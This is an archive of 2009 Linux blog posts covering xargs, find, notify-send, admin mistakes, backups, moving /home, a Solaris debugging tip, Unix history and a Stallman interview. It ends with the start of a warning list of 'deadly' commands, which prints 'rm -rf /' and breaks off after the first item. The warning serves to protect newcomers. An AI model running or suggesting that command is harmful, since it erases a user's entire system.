Wednesday, September 9, 2009


Unix Xargs Piping Toolkit Utility

xargs constructs an argument list for an arbitrary Unix command from
standard input and then executes that command.

xargs [options] [command]

The xargs command builds the argument list for command from standard
input. It is typically used at the end of a pipe, taking its input from
commands such as ls and find. The latter is probably the most common
source of xargs input and is covered in the examples below.

One of the most common xargs applications in pipes is to execute a
command once for each piped record:

find . -name '*050106*' -print | xargs -n2 grep 'From: Ralph'
cat iplist | xargs -n1 nmap -sV
The find command searches the entire directory structure for filenames
that contain 050106. The xargs command then executes grep once for every
two arguments (so that the matching filename stays visible in grep's
output). In the second example, cat supplies the list of IPs for nmap
to scan.

On many Unix systems there is a limit on the length of a single
command line. This is often a problem when you analyze spam blocked by
a spam filter. Here xargs can help: if the argument list read by xargs
is larger than the maximum allowed, xargs will bundle the arguments
into smaller groups and execute command separately for each argument
bundle.

If no command is specified, xargs behaves like the echo command
and prints the argument list to standard output.
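This default-echo behavior is easy to see at the shell; a quick sketch:

```shell
# xargs with no command behaves like echo: it joins its input
# lines into a single argument list and prints it.
printf '%s\n' alpha beta gamma | xargs
```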

Options
Option Description
-n# Execute command once for every # arguments. For example, -n2
bundles arguments into groups of two or fewer and executes command on
each argument bundle.
-l# Execute command once for every # lines of input. For example, -l1
creates a bundle of arguments for each line of input and executes
command on each argument bundle.
-i Normally xargs places input arguments at the end of command. With
the -i option, xargs instead replaces every instance of {} in command
with the input arguments. You need to put the braces in single quotes,
or use a backslash (\) before each brace, to keep the shell from
interpreting them.
-t Echo each command before executing it. Nice for debugging.
-p Prompt the user before executing each command. Also useful for debugging.

Examples
To use a command on files whose names are listed in a file, enter:
xargs lint -a < cfiles
If the cfiles file contains the following text:

main.c readit.c
gettoken.c
putobj.c
the xargs command constructs and runs the following command:

lint -a main.c readit.c gettoken.c putobj.c
If the cfiles file contains more file names than fit on a single shell
command line (up to LINE_MAX), the xargs command runs the lint command
with the file names that fit. It then constructs and runs another lint
command using the remaining file names. Depending on the names listed
in the cfiles file, the commands might look like the following:

lint -a main.c readit.c gettoken.c . . .
lint -a getisx.c getprp.c getpid.c . . .
lint -a fltadd.c fltmult.c fltdiv.c . . .

This command sequence is not quite the same as running the lint
command once with all the file names. The lint command checks
cross-references between files. However, in this example, it cannot
check between the main.c and the fltadd.c files, or between any two
files listed on separate command lines.

For this reason you may want to run the command only if all the file
names fit on one line. To specify this to the xargs command use the -x
flag by entering:
xargs -x lint -a <cfiles
If all the file names in the cfiles file do not fit on one command
line, the xargs command displays an error message.


To construct commands that contain a certain number of file names, enter:
xargs -t -n 2 diff <<EOF
starting chap1 concepts chap2 writing
chap3
EOF
This command sequence constructs and runs diff commands that contain
two file names each (-n 2):
diff starting chap1
diff concepts chap2
diff writing chap3
The -t flag causes the xargs command to display each command before
running it, so you can see what is happening. The <<EOF and EOF
markers define a here-document, which uses the text entered before the
closing marker as standard input for the xargs command.
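The same bundling can be demonstrated without any real files by letting echo stand in for diff, so the groups of two become visible:

```shell
# -n 2 groups the here-document input into pairs; echo prints
# each pair on its own line instead of diffing files.
xargs -n 2 echo <<EOF
starting chap1 concepts chap2 writing
chap3
EOF
```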


To insert file names into the middle of command lines, enter:
ls | xargs -t -I {} mv {} {}.old
This command sequence renames all files in the current directory by
adding .old to the end of each name. The -I flag tells the xargs
command to insert each line of the ls directory listing where {}
(braces) appear. If the current directory contains the files chap1,
chap2, and chap3, this constructs the following commands:
mv chap1 chap1.old
mv chap2 chap2.old
mv chap3 chap3.old

To run a command on files that you select individually, enter:
ls | xargs -p -n 1 ar r lib.a
This command sequence allows you to select files to add to the lib.a
library. The -p flag tells the xargs command to display each ar
command it constructs and to ask if you want to run it. Enter y to run
the command. Press any other key if you do not want to run the
command.
Something similar to the following displays:

ar r lib.a chap1 ?...
ar r lib.a chap2 ?...
ar r lib.a chap3 ?...

To construct a command that contains a specific number of arguments
and to insert those arguments into the middle of a command line,
enter:
ls | xargs -n6 | xargs -I{} echo {} - some files in the directory
If the current directory contains files chap1 through chap10, the
output constructed will be the following:

chap1 chap2 chap3 chap4 chap5 chap6 - some files in the directory
chap7 chap8 chap9 chap10 - some files in the directory
Typically, arguments are lists of filenames passed to xargs via a pipe.
Compare:

$ ls 050106*
$ ls 050106* | xargs -n2 grep "From: Ralph"
In the first example, the list of files whose names start with 050106
is printed. In the second, grep is executed once for every two such files.
Additional Examples
John Meister's UNIX Notes

Change permissions on all regular files in a directory subtree to mode
444, and permissions on all directories to 555:

find -type f -print | xargs chmod 444
find -type d -print | xargs chmod 555

$ ls * | xargs -n2 head -10
line 1 of f1
line 2 of f1
line 3 of f1

ls * | xargs -n1 wc -l

(date +%D ; du -s ~) | xargs >> log

ls *.txt | xargs -i basename \{\} .ascii \
| xargs -i mv \{\}.ascii \{\}.ask

(Note the backslash usage.)


Another example: let's cat the contents of files listed in a file, in
that order.

$ cat file_of_files
file1
file2

$ cat file1
This is the data in file1

$ cat file2
This is the data in file2
So there are three files here: "file_of_files", which contains the
names of the other files, in this case "file1" and "file2". The
contents of "file1" and "file2" are shown above.


$ cat file_of_files | xargs cat
This is the data in file1
This is the data in file2

What if you want to find a string in all files in the current
directory and below? The following script will do it.

#!/bin/sh
SrchStr=$1
shift
for i in "$@"; do
find . -name "$i" -type f -print | xargs egrep -n "$SrchStr" /dev/null
done
Another quite nice thing, used for updating CVS/Root files on a Zaurus:
find . -name Root | xargs -n1 cp newRoot
This copies the contents of newRoot into every Root file (-n1 runs cp
once per file). To write a string into every Root file instead, the
redirection has to happen inside a shell, since xargs does not invoke
one itself:

find . -name Root | xargs -n1 sh -c 'echo user@machine.dom:/dir/root > "$0"'

These pieces of randomness will look for all .sh files in PWD and
print the 41st line of each - don't ask me why I wanted to know.
Thanks to Brian R for these.

for f in *.sh; do sed -n '41p' $f; done
or

ls *.sh | xargs -l sed -n '41p'

Remove all the files in otherdir that also exist in thisdir:
ls -1d ./* | xargs -i rm otherdir/{}

Thursday, September 3, 2009

Tech Tip: Get Notifications from Your Scripts with notify-send

notify-send is a great little utility for notifying you when an event has occurred, such as a script running to completion.

If notify-send is not installed on your machine already, install the package "libnotify-bin" from your repositories.

Once installed you can simply type the following, at the command line, to display a pop-up message near your system tray:

notify-send "hello"

By default the message will be displayed for 5 seconds. To change how long a message stays displayed use the "-t" switch. This will change, in milliseconds, how long the message is displayed. Enter "-t 0" to leave the message up until the user closes it.

notify-send "This message will be displayed for 3 seconds" -t 3000
notify-send "Click me to close me." -t 0

You can even add a title and an icon to the notification.

notify-send "This is the Title" \
"Check out the cool icon" \
-i /usr/share/pixmaps/gnome-terminal.png

When used in a script you could set it to notify you periodically by placing the command in a loop:

#!/bin/bash

while true; do
    notify-send "Up Time" "$(uptime)"
    sleep 5m
done
__________________________

UBUNTU LINKS

Ubuntu-related links:

Community Support
GetDeb - Ubuntu Linux
Paid Support
Planet Ubuntu
Psychocats Resources
Report A Problem
ShipIt
The Fridge
Ubuntu
Ubuntu Archives
Ubuntu brainstorm
Ubuntu Documentation
Ubuntu Download
Ubuntu Forums
Ubuntu Hardware Support
Ubuntu News
Ubuntu Spotlight
Ubuntu Training
Ubuntu Tutorials
Ubuntu Wiki
Using APT
What Is Ubuntu?

Extra links useful in Ubuntu:
Gnome Themes
Nautilus Scripts

Wednesday, September 2, 2009

Finding Files On The Command Line

One of the things I like about Linux is the command line. I have used nautilus, gnome-commander, konqueror, kommander, dolphin and thunar to manage files in Linux and these file managers are great for what they do. But there are times when one simply wants to find a file when working on the command line without having to open a GUI application.

From the find man page:

GNU find searches the directory tree rooted at each given file name by evaluating the given expression from left to right, according to the rules of precedence, until the outcome is known, at which point find moves on to the next file name.

Find empty directories:

find /path -depth -type d -empty

Find empty files:

find /path -depth -type f -empty

Find a file with a specific name:

find /path -name name_of_file

Find files with a specific extension:

find /path -name "*.given_extension"

Find files with specific permissions which have a ".txt" file extension:

find /path -name '*.txt' -perm 644

Find files with some given permissions:

find /path -perm -permission_bits
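A quick way to see -perm matching in action, using a throwaway directory as a stand-in for your real /path:

```shell
# Give one file mode 644, then ask find for entries whose
# permissions are exactly 644; only that file should match.
mkdir -p /tmp/perm_demo
chmod 755 /tmp/perm_demo
touch /tmp/perm_demo/file.txt
chmod 644 /tmp/perm_demo/file.txt
find /tmp/perm_demo -perm 644
```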

Find files with a given name and any extension:

find /path -name 'given_name.*'

Find files modified in the latest blocks of 24 hours:

find -mtime n

Find files that were accessed in the latest blocks of 24 hours:

find -atime n

find -atime n

Where n is:

  • 0 for the last 24 hours
  • 1 for the last 48 hours
  • 2 for the last 72 hours

Find files according to owner:

find /path -user root

One can also pipe find commands to the xargs command to execute commands on files.

Find and delete files:

find /path -name mytestfile | xargs rm
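One caveat worth knowing: filenames containing spaces break a plain find | xargs pipe. GNU find's -print0 paired with xargs -0 keeps each name intact; a small sketch on a throwaway directory:

```shell
# Create a file whose name contains a space, then delete it
# safely: -print0/-0 pass names separated by NUL bytes, so
# spaces (and even newlines) in filenames survive the pipe.
mkdir -p /tmp/xargs_demo
touch "/tmp/xargs_demo/my test file"
find /tmp/xargs_demo -name '*test*' -type f -print0 | xargs -0 rm
```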

See man find and man xargs for more information about these powerful commands.

Many new Linux users are intimidated by the command line and this feeling should be overcome from the onset because the command line can be faster and more powerful than most GUI applications.


An alternative way to find and delete files using only find.

find /path -name mytestfile -exec rm '{}' \;

Everything between -exec and \; gets executed once per file, and '{}' is replaced with the name of the file found.

This can be used to do just about anything with files. So for example, find and delete all CVS folders in a project:

find /path -name CVS -type d -exec rm -r '{}' \;

Create an MD5 hash of all files in a folder:

find /home/williamb/ -type f -exec md5sum '{}' \;
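Ending -exec with + instead of \; batches many filenames into a single md5sum invocation, much like piping to xargs. A sketch with a throwaway directory standing in for /home/williamb:

```shell
# Two sample files; find hands both to one md5sum call, so the
# output has one hash line per file without forking per file.
mkdir -p /tmp/md5_demo
echo one > /tmp/md5_demo/a.txt
echo two > /tmp/md5_demo/b.txt
find /tmp/md5_demo -type f -exec md5sum '{}' +
```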

Thursday, August 27, 2009

10 Common Mistakes Made by New Linux Administrator

As Linux squeezes itself into all facets of technology, more people are being forced to use it who have little knowledge of the foreign Unix land. Maybe you're trying to learn your way around, or maybe you're the Windows guy who just got 'promoted' to maintaining the Linux system; either way, things are odd, and you just really, really don't want to fubar the system. For those of you who fall into that category, this article is for you. Below are ten mistakes often made by new Linux administrators.

1. Failing To Use CheckInstall

Linux uses package managers, which keep everything installed on your system updated and clean. When two or more apps rely on each other, it is imperative that all of them are kept updated, not just a few. Thus, when you install one program via whatever package manager your distro uses but another from source, the package manager will only update the first, which could cause things to stop working properly.

The solution to this is to use Checkinstall to build a package for your system that will stay updated along with the other software, which will save you headaches in the future.

2. Refusal to Use the Command Line Interface

You just have to learn it. It's that simple. You cannot be a sysadmin in any system while harboring a fear of the command line, but that is doubly true in Linux. While you can manage to do most things with some form of a GUI, it is almost always faster and easier to learn how to do it from the Terminal. Learn some bash already.

3. Having No or Weak Root Password

Someone getting their hands on the root password is like some crony gaining control of Darth Vader's big laser that blew up Alderaan. If you have no root password, then you're either a very green sysadmin, or you're an idiot. If you have a weak one, then you're naive. Here is a very big tip: if you don't have a password, set one RIGHT NOW; if it is a simple word, especially a word in the dictionary, change it RIGHT NOW to something at least fourteen characters long with uppercase, lowercase, numbers, and symbols.

4. Pretending Updates Don't Exist

For whatever reason, people don't like updates. That is understandable if you're being fed them day after day, but really--updates keep things working (most of the time). Sometimes it is laziness--there may be hundreds of updates if you put it off for a while, and no one likes to pick through those, so they just put it off longer and longer until something stops working. You must update. If you disable auto-updates, then check them every day. Sift through them each time and only install the ones you need. Do this every time. Your install will thank you.

5. Making Changes Without Backing Up First

If you're going to pick through, for example, the resolution config file to try to get your three-monitor system running properly, you really should back up the file first. This goes for all changes and tweaks. In fact, just go ahead and create a backup of every major file right now, so that when you forget later, your foresight will have saved you from FUBAR hell.
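A one-line habit that makes this painless is bash's brace expansion, which turns file{,.bak} into "file file.bak". Here /tmp/demo.conf is a stand-in for whatever file you are about to edit:

```shell
# Copy the file to a .bak twin before touching it (bash/zsh
# brace expansion; in plain sh, spell out both names).
touch /tmp/demo.conf
cp /tmp/demo.conf{,.bak}
```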

6. Not Learning to Trouble Shoot Their System

Each distro is like a baby--they are similar on the surface, but when you spend time with them, there are noticeable differences. For that reason, it is very important that you spend time with your distro and learn its peculiarities. Want an example? One user who had messed up his Ubuntu resolution was freaking out because his screen was scrambled, and he was trying to fix it from the command line. That seems fine, except that if he'd spent time getting to know his system, he'd have simply booted into recovery mode and reset his resolution to default. Knowledge is not only power; it's a time saver, too.

7. Ignoring Logs like the Plague

See, there are these little things inside /var/log called LOGS that tell you magical things about your system, like errors and security issues. They give you valuable information that can be used to correct problems and head off unfortunate issues. Doing so will make your life as admin much, much easier. So then, why do you ignore them? Out of fear? Trepidation? Misplaced respect? Open the system logs once in a while and see what's up, okay?
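A first pass at an unfamiliar log is often just pulling out the error lines with grep. The sample file below is a stand-in for a real log such as /var/log/syslog:

```shell
# Build a tiny sample log, then filter it case-insensitively
# for error lines -- the same command works on real logs.
printf '%s\n' 'ok: service started' 'ERROR: disk full' 'ok: done' > /tmp/sample.log
grep -i error /tmp/sample.log
```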

8. Keeping Everything in One Giant Partition

Of course, this is only valid if you're the one doing the installing. You don't want everything to sit in one partition, for many reasons, two of which are performance and convenience. You're probably going to change distros at some point, so to make your life easier, put your home directory in a different partition than the rest. This will make your life easier at some point, trust me.

9. Running as Root

Image from xkcd.com

For you Windows users, that means Admin. You're not supposed to run as admin; nothing good ever comes of it. When using the terminal, simply use 'su' or 'sudo' or whatever your system's command is for running as root. This is more than powerful enough for the things you must do.

10. Asking Help From Random People

If Linux has been thrust upon you and you're left trying to pick your way through things that mean nothing to you, then no one will blame you for seeking help when issues arise. With that said, be careful who you seek help from, and be very wary of what you run through the Terminal. There are people who get their kicks from making your life hell. Get the help of a pro when things go bad.

*Update: A special thank you to all readers who have brought to our attention that the Sudo image was not attributed correctly to xkcd.com. This has now been rectified. In the future we will ensure all images are attributed to the correct source. - Laptoplogic.com team

Wednesday, August 26, 2009

Richard Stallman: Not even Ubuntu, Firefox or social networks are spared

From Sun Bloggers

Free software guru Richard Stallman, on a visit to Argentina, took aim at social networks, at the giants Google and Microsoft, at Firefox, and even at the most popular version of Linux today, Ubuntu.

With Buenos Aires as its venue, the fifth edition of this annual event, called "Wikimanía", begins this Wednesday the 26th and runs through August 28. It is the first time the conference has been organized in a Spanish-speaking country. It will also be bilingual, with an accreditation fee of US$ 60.

The Wikimedia Foundation is in charge of organizing this fifth international conference, which brings together the community and the public interested in collaborative projects. The venue will be the Teatro San Martín in Buenos Aires, and the event will feature Richard Stallman, one of the leading figures of the free software movement, and Jimmy Wales, the founder of Wikipedia.

This is the first edition of Wikimanía to be held in a Spanish-speaking country and in the Southern Hemisphere, and "wikimaniacs" from all over the world have already confirmed their attendance. The four previous editions of the event took place in Frankfurt (Germany), Boston (USA), Taipei (Taiwan) and Alexandria (Egypt).

Wikimanía is one of the world's largest events on technology, the Internet and networked digital culture. Over three days, thousands of participants gather to share concerns, exchange experiences and coordinate actions around the collaborative Internet, new technologies and the projects of Wikipedia, the free online encyclopedia.

Stallman will be one of the main speakers.

Stallman is a man who needs no introduction in the open source world.

For those unaware of his reputation, Stallman founded the GNU Project in 1983 and has always been an uncompromising defender of free, unrestricted software.

In an interview with the newspaper La Nación, Stallman let loose on everyone: social networks, Microsoft, Google, even the most popular GNU/Linux distribution, Ubuntu, and the free software browser, Firefox.

Windows 7: It has all the malicious features of Windows Vista. It may have fewer bugs, but for me the bugs are secondary; for me it is about the abuse of the user.

Windows has three kinds of malicious functionality: it sends messages reporting what the user does, it restricts what the user can do with the machine, and it makes changes without asking the approval of the machine's supposed owner.

Google: It does several things, and I prefer to judge each one separately. There are several services in which I see no specific problem, but there are others where users do not realize they are installing proprietary software; their browser does it invisibly. It does not warn that it is downloading a proprietary application, but it does it anyway. In the jargon, this application is called JavaScript.

It is possible that all of Google's services transmit proprietary programs, but some keep working without activating them. The search engine, for example, still works without JavaScript. Gmail is usually used with a proprietary JavaScript application; it has a version without JavaScript, but it is not used much. It is borderline, barely acceptable. There are services, such as Google Docs, that do not work at all without this kind of component.

Perhaps it has some 100% clean application, but I do not know them all. Google Earth, however, requires the explicit installation of a proprietary program; it is not hidden, and it should not be used.

Social networks: I do not like them as they are. I have not tried them because I have no time for such things. But the idea of the social network as a concept does not seem bad to me in itself; the problem is that most of these services present a false image of privacy, and they should act honestly.

They should warn the user of the danger that anything said on the site may end up public, because this is very possible. What they do is suggest that, if you prefer, you can show the information only to your friends, but they do not make clear that those friends can pass it on to others, and so it reaches the general public.

Firefox: Today it is free software, but it suggests proprietary plugins. We offer IceCat, a browser that does not suggest proprietary software, and that is very important: a proprietary program is not ethical. Suggesting its use as if it were a solution is asserting that it is not a problem.

Ubuntu: It does not help people value their freedom. They could have helped the movement, but they did not.

Source: urgente24.com

Sunday, August 23, 2009

Audacious 2.1 Review - Powerful Audio Replacement for XMMS

Audacious is a powerful audio player for Linux which resembles the older XMMS, but uses the GTK2 toolkit for its interface. It supports XMMS and, implicitly, Winamp 2.x skins, and comes with support for various audio formats, including MP3, Ogg Vorbis, FLAC (Free Lossless Audio Codec) and WMA (Windows Media Audio).


Audacious was forked from Beep Media Player, which was itself based on XMMS but whose development was discontinued in 2006. Audacious is actively maintained, and the latest version was released in July this year. For a tutorial on installing the latest release in Ubuntu 9.04, check out this tutorial I put up a while ago.

The version I used for this review is 2.1, as currently included in the Ubuntu 9.10 Karmic repositories. Audacious comes with the typical, simple interface some of you are used to from XMMS. It includes a main window with regular play/pause/stop and volume buttons, a 10-band equalizer and the playlist itself.

The playlist can be arranged easily to display various fields, like only the artist, album, song title and duration, but it can also be sorted by title, album, artist, filename, path, date, track number or (the default) playlist entry. Adding a large collection of music to the playlist can take a very long time, but once they're loaded, Audacious will prove very fast.

Aside from skins and the equalizer, this player really comes bundled with a lot of features: visualizations, a simple tag editor, a playlist manager. But the true power of Audacious is its support for plugins. It comes with a huge number of them, including Last.fm song submission, an alarm, GNOME shortcuts, global shortcuts and a status icon for Pidgin, among others. Plugins really turn it into a more useful, powerful experience. Local cover art fetching should not be forgotten either.


Regarding configurability, Audacious is very rich. It allows you to select which output plugin it will use, configure the replay gain, customise its appearance by installing new skins, configure playback, also offering a rich variety of options for the playlist.


Audacious is a wonderful player, and it will fit those who like XMMS or users who switched from Windows and are used to Winamp. It also takes a different approach than players that share a common interface, like Rhythmbox, Banshee or Exaile.

Source: http://tuxarena.blogspot.com/2009/08/audacious-21-review-powerful-audio.html

How to copy / clone user account in Linux?

Task: Copy / clone a user account, so that both users have the very same settings in their home directories.

Copying of the user's home directory (e.g. olduser) to new user (e.g. newuser) is easy:
1. Create new user: adduser newuser
2. Copy all special hidden (dot) files to new user's home directory: cp --recursive /home/olduser/.[a-zA-Z0-9]* /home/newuser
3. Copy other standard files to new user directory: cp --recursive /home/olduser/* /home/newuser
4. Set the owner of the new user's hidden dot files to the new user: chown --recursive newuser:users /home/newuser/.[a-zA-Z0-9]*
(Do not use /home/newuser/.* here: the .* pattern also matches the parent directory "..", which would change the owner of /home itself.)
5. Set new user's directory and files owner to new user for normal files: chown --recursive newuser:users /home/newuser/*

You are done. In some cases you would need to change user group (users in this case).
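The copy steps above can be sketched end to end. SRC and DST below are throwaway stand-ins for the real /home/olduser and /home/newuser; the chown steps from the list still require root and are left out of this sketch:

```shell
# Clone one "home" into another: dot files first, then the
# regular files, exactly as in steps 2 and 3 above.
SRC=/tmp/olduser
DST=/tmp/newuser
mkdir -p "$SRC" "$DST"
echo 'alias ll="ls -l"' > "$SRC/.bashrc"   # sample hidden file
echo notes > "$SRC/notes.txt"              # sample regular file
cp --recursive "$SRC"/.[a-zA-Z0-9]* "$DST"
cp --recursive "$SRC"/* "$DST"
```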

Now just logout and try to login as the new user. All the settings for the programs should be the very same as for the old user. You can for example compare the settings by running KDE and checking the wallpaper and other settings of the new user. If the copying of the user folder was successful, everything will look the same.

Source: http://www.ambience.sk/user-account-copy-linux

MOVING YOUR HOME DIRECTORY

Having the "/home" directory tree on its own partition has several advantages, the biggest perhaps being that you can reinstall the OS (or even a different distro of Linux) without losing all your data. You can do this by keeping the /home partition unchanged and reinstalling the OS, which goes in the "/" (root) directory and can be on a separate partition.

But you, like me, may not have known this when you first installed Ubuntu, and so did not create a separate partition for "/home". Despair not: it is really simple to move "/home" to its own partition.

First, create a partition of sufficient size for your “/home” directory. You may have to use that new hard drive, or adjust/resize the existing partition on your current hard-drive to do this. Let me skip those details.

Next, mount the new partition:
$sudo mkdir /mnt/newhome
$sudo mount -t ext3 /dev/hda5 /mnt/newhome

(You have to change "hda5" in the above to the correct partition label for the new partition. Also, the above assumes that the new partition you created is formatted as an ext3 partition. Change "ext3" to whatever filesystem the partition is formatted with.)

Now, Copy files over:
Since the “/home” directory will have hardlinks, softlinks, files and nested directories, a regular copy (cp) may not do the job completely. Therefore, we use something we learn from the Debian archiving guide:
$cd /home/
$find . -depth -print0 | cpio --null --sparse -pvd /mnt/newhome/

Make sure everything copied over correctly. You might have to do some tweaking and honing to make sure you get it all right, just in case.

Next, unmount the new partition:
$sudo umount /mnt/newhome

Make way for the new “home”
$sudo mv /home /old_home

Since we moved /home to /old_home, there is no longer a /home directory. So first we recreate a new /home:
$sudo mkdir /home

Mount the new home:
$sudo mount /dev/hda5 /home
(Again, you have to change "hda5" to whatever the new partition's label is.)

Cursorily verify that everything works right.

Now, you have to tell Ubuntu to mount your new home when you boot. Add a line to the “/etc/fstab” file that looks like the following:

/dev/hda5 /home ext3 nodev,nosuid 0 2
(Here, change the partition label "hda5" to the label of the new partition, and you may have to change "ext3" to whatever filesystem you chose for your new "home".)

Once all this is done, and everything works fine, you can delete the “/old_home” directory by using:
$sudo rm -r /old_home

Michael, Russ and Magnus posted this solution on the ubuntu-users mailing list a few months ago.


FONT: http://embraceubuntu.com/2006/01/29/move-home-to-its-own-partition/

How to Simple Backup

Many computer users realize how invaluable a backup scheme can be, and most Linux distros already include the software required for a simple one. I am going to show you how to write a simple bash script that archives specified files in your home directory and adds the date/time to the filename of the archive. A GUI backup application is great for folks who are comfortable with GUI apps. However, those types of apps are, in my opinion, overkill for simple backups.

Creating the backup script
Go to a console, or open a terminal emulator if you happen to be in a GUI environment.

Change directories to the path where you want to store the script. I keep all bash scripts in a "bin" directory in my home directory; this keeps things a bit more organized. You should create a bin directory in your home directory if it doesn't already exist.
cd $HOME/bin

Create a new file.
touch mybackups.sh

Open your favorite text editor and add the code below to the new file. I have included comments to show how the script can be personalized and to point out the areas you may want to change. Lines 2 - 8 can be omitted, but I feel this information should always be included in scripts for obvious reasons.

#!/bin/bash
# Filename:
# Version:
# Date:
# Author:
# License:
# Requires:
# Description:

# Change directories to /home
cd /home

# Archive all files in $HOME
# Change /target/path to your desired target path
# Certain files can be excluded from the archive with --exclude=filename
tar -cjf /target/path/temp.tar.bz2 --exclude=*gvfs $USER

# Check for a previous backup with identical filename
# Change /target/path to your desired target path
# Change date +%Y%m%d to your desired date/time; see man date
# Change backups as needed
if [ -e /target/path/$(date +%Y%m%d)-backups.tar.bz2 ]
then
rm /target/path/$(date +%Y%m%d)-backups.tar.bz2
fi

# Move the archive
# Change /target/path to your desired target path
# Change date +%Y%m%d to your desired date/time; see man date
# Change backups as needed
mv /target/path/temp.tar.bz2 /target/path/$(date +%Y%m%d)-backups.tar.bz2

# Done
exit

Automation
A very important point needs to be made here. As important as backups are, any backup scheme is pretty much useless unless it's scheduled in some way. Imagine needing to restore from a backup only to find that the backup is several months old. It's quite easy to add a backup script like the one above to a cronjob so the backup is created on a timely basis, I run the above script in a daily cronjob. For a tutorial on cronjobs, please see my Crontab Tutorial.
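For reference, a hypothetical crontab entry (added via crontab -e) that runs the script every day at 2:00 AM might look like this; adjust the path to wherever you saved mybackups.sh:

```
# minute hour day-of-month month day-of-week  command
0 2 * * * $HOME/bin/mybackups.sh
```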

Conclusion
That's it. This script can be executed with sh mybackups.sh after which you should have a new archive located in /target/path. I have two hard drives in all of my computers - the second hard drive is used to store files such as backups.

I like this type of script because it's simple - it's only 9 lines of code if you omit the comments - and can be edited as the user desires. Again, this type of script, like any backup scheme, should be used with some type of automation to make scheduled backups without user intervention - a cronjob is a great idea for this script. For a tutorial on cronjobs, please see my Crontab Tutorial.

FONT: http://ardchoille42.blogspot.com/2009/08/how-to-simple-backups.html

Friday, August 21, 2009

Solaris tip of the week: use mdb to view process stack

The Solaris pstack command can be used to view most user process stacks, but I recently encountered a situation where even pstack -F could not be used to view the process stack.

I issued a zfs recv operation that never returned.

# ps -ef | grep zfs

root 7485 7484 0 01:40:01 ? 0:00 zfs recv -F storage ...

# pstack -F 7485

[no output]

pstack could not grab control of the process to display the stack.

My next option was to use mdb to view the stack - not quite as convenient as pstack, but more powerful. Here are the steps:

# mdb -k

/* get a handle to the zfs process using ::pgrep */

>::pgrep zfs

S PID PPID PGID SID UID FLAGS ADDR NAME
R 7485 7484 7484 7484 0 0x4a004000 ffffff278437ca88 zfs

/* use the returned ADDR value to get the process threadlist */

> ffffff278437ca88::threadlist
ADDR PROC LWP CMD/LWPID
ffffff278437ca88 ffffff21da3b68e0 0 /239

/* use the PROC value to view the stack */

> ffffff21da3b68e0::findstack
stack pointer for thread ffffff21da3b68e0: ffffff00f88fc880
[ ffffff00f88fc880 _resume_from_idle+0xf1() ]
ffffff00f88fc8b0 swtch+0x160()
ffffff00f88fc960 turnstile_block+0x764()
ffffff00f88fc9d0 rw_enter_sleep+0x1a3()
ffffff00f88fca40 dsl_dataset_clone_swap+0x61()
ffffff00f88fca90 dmu_recv_end+0x57()
ffffff00f88fcc40 zfs_ioc_recv+0x31e()
ffffff00f88fccc0 zfsdev_ioctl+0x10b()
ffffff00f88fcd00 cdev_ioctl+0x45()
ffffff00f88fcd40 spec_ioctl+0x83()
ffffff00f88fcdc0 fop_ioctl+0x7b()
ffffff00f88fcec0 ioctl+0x18e()
ffffff00f88fcf10 sys_syscall32+0x101()

40 years of Unix

By Mark Ward
Technology Correspondent, BBC News

Network cables, BBC
Unix had computer networking built in from the start

The computer world is notorious for its obsession with what is new - largely thanks to the relentless engine of Moore's Law that endlessly presents programmers with more powerful machines.

Given such permanent change, anything that survives for more than one generation of processors deserves a nod.

Think then what the Unix operating system deserves because in August 2009, it celebrates its 40th anniversary. And it has been in use every year of those four decades and today is getting more attention than ever before.

Work on Unix began at Bell Labs after AT&T, (which owned the lab), MIT and GE pulled the plug on an ambitious project to create an operating system called Multics.

The idea was to make better use of the resources of mainframe computers and have them serve many people at the same time.

"With Multics they tried to have a much more versatile and flexible operating system, and it failed miserably," said Dr Peter Salus, author of the definitive history of Unix's early years.

Time well spent

The cancellation meant that two of the researchers assigned to the project, Ken Thompson and Dennis Ritchie, had a lot of time on their hands. Frustrated by the size and complexity of Multics but not its aims of making computers more flexible and interactive, they decided to try and finish the work - albeit on a much smaller scale.

The commitment was helped by the fact that in August 1969, Ken Thompson's wife took their new baby to see relatives on the West Coast. She was due to be gone for a month and Thompson decided to use his time constructively - by writing the core of what became Unix.

He allocated one week each to the four core components: operating system, shell, editor and assembler. It was during that time, and afterwards as the growing team got the operating system running on a DEC computer known as the PDP-7, that Unix came into being.

It got us away from the total control that businesses like IBM and DEC had over us
Peter Salus, author

By the early 1970s, five people were working on Unix. Thompson and Ritchie had been joined by Brian Kernighan, Doug McIlroy and Joe Ossanna.

The name was reportedly coined by Brian Kernighan - a lover of puns who wanted Unics to stand in contrast to its forebear Multics.

The team got Unix running well on the PDP-7 and soon it had a long list of commands it could carry out. The syntax of many of those commands, such as chdir and cat, is still in use 40 years on. Along with it came the C programming language.

But, said Dr Salus, it wasn't just the programming that was important about Unix - the philosophy behind it was vital too.

"Unix was created to solve a few problems," said Dr Salus, "the most important of which was to have something that was much more compact than the operating systems that were current at that time which ran on the dinosaurs of the computer age."

Net benefits

Back in the early 1970s, computers were still huge and typically overseen by men in white coats who jealously guarded access to the machines. The idea of users directly interacting with the machine was downright revolutionary.

"It got us away from the total control that businesses like IBM and DEC had over us," said Dr Salus.

Word about Unix spread and people liked what they heard.

"Once it had jumped out of the lab and out of AT&T it caught fire among the academic community," Dr Salus told the BBC. What helped this grassroots movement was AT&T's willingness to give the software away for free.

DEC PDP-1 computer
DEC's early computers were for many years restricted to laboratories

That it ran on cheap hardware and was easy to move to different machines helped too.

"The fact that its code was adaptable to other types of machinery, in large and small versions meant that it could become an operating system that did more than just run on your proprietary machine," said Dr Salus.

In May 1975 it got another boost by becoming the chosen operating system for the internet. The decision to back it is laid out in the then-nascent Internet Engineering Task Force's document RFC 681, which notes that Unix "presents several interesting capabilities" for those looking to use it on the net.

It didn't stop there. Unix was adapted for use on any and every computer from mainframes to desktops. While it is true that it did languish in the 1980s and 90s as corporations scrapped over whose version was definitive, the rise of the web has given it new life.

The wars are over and the Unix specification is looked after by the Open Group - an industry body set up to police what is done in the operating system's name.

Now Unix, in a variety of guises, is everywhere. Most of the net runs on Unix-based servers and the Unix philosophy heavily influenced the open source software movements and the creation of the Linux desktop OS. Windows runs the communication stack created for Unix. Apple's OS X is broadly based on Unix and it is possible to dig into that software and find text remarkably similar to that first written by Dennis Ritchie in 1971.

"The really nice part is the flexibility and adaptability," said Dr Salus, explaining why it is so widespread and how its ethic fits with a world at home with the web.

"Unix is the best screwdriver ever built," said Dr Salus.

The 7 Deadly Linux Commands

If you are new to Linux, chances are you will run into someone, perhaps in a forum or chat room, who will try to trick you into using commands that can harm your files or even your entire operating system. To help you avoid that scenario, here is a list of deadly Linux commands that you should never run.

1. Code:

rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

